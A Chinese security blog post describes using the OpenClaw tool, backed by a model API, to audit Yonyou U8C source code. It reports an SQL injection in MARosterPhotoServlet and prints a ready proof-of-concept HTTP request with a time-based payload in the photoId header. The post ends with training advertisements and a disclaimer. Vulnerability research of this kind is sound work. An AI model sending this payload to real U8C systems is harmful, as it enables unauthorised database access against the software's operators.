文章总结： 本文介绍了利用开源工具OpenClaw自动审计用友U8C系统漏洞的实战流程。OpenClaw需本地部署并对接模型API，文章演示了通过导入历史审计文档辅助工具分析，成功在源码中发现一处SQL注入漏洞。具体位于MARosterPhotoServlet中，攻击者可利用photoId请求头参数进行注入，文中提供了详细的POC验证数据包。文末附带相关安全培训推广信息。 综合评分： 80 文章分类： 代码审计,漏洞分析,安全工具,实战经验

Openclaw技术解析：自动审计用友U8C代码漏洞指南

原创

chobits02 chobits02

C4安全

2026年3月5日 15:31 江苏

/部署注意点/

在部署 OpenClaw 前，你需要先了解两个基本概念：

1. OpenClaw 是一套可运行的开源软件，你可以把它部署到你的 Windows 上也可以是 Mac 上或者 Linux 上。

这里核心是告诉你 OpenClaw 服务的运行消耗的是你自己电脑的资源，这块是免费的，你只要安装好就可以永久使用。

2. OpenClaw 本身是开源免费的，但是 OpenClaw 的使用需要对接模型的 API（接口）才行。

下面开始代码审计实战，准备工作如下：

1.准备需要审计的源码，这里我准备了用友U8C源码的压缩包。

2.准备代码审计案例和规则文档，或者让Openclaw安装一些专门审计代码的skill

然后开始对话操作流程，先准备技能和工具。

安装完成后，把历史审计思路文档发给他。

这里我用的我自己以前审计用友U8C时候写的发现漏洞思路+POC验证文档喂给他。

这里飞书机器人对话就很方便了，一键发送文档。

前三条Controller方法中的SQL注入，方法里是有SQL拼接漏洞的，但是我不确定是否可以直接请求到，第四个Servlet就很好看了，而且漏洞点也确实存在。

我们来看源码，源码位于pubcloud\pubcloud\code.jar

漏洞代码如下：

photoId请求头参数拼接到SQL语句中，造成SQL注入

因此构造的漏洞请求数据包如下：

GET /servlet/~uap/com.yonyou.ma.roster.servlet.MARosterPhotoServlet?pageId=login HTTP/1.0Host: XXXXaccountcode: U8cloudtype: pidphotoId: 1';waitfor delay'0:0:4'--

内部src培训视频，内部知识圈，可私聊领取优惠券，加入链接：https://wiki.freebuf.com/societyDetail?society_id=184

安全渗透感知大家族

（新人优惠券折扣20.0￥，扫码即可领取更多优惠）

内部交流群

END

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：C4安全 chobits02 chobits02《Openclaw技术解析：自动审计用友U8C代码漏洞指南》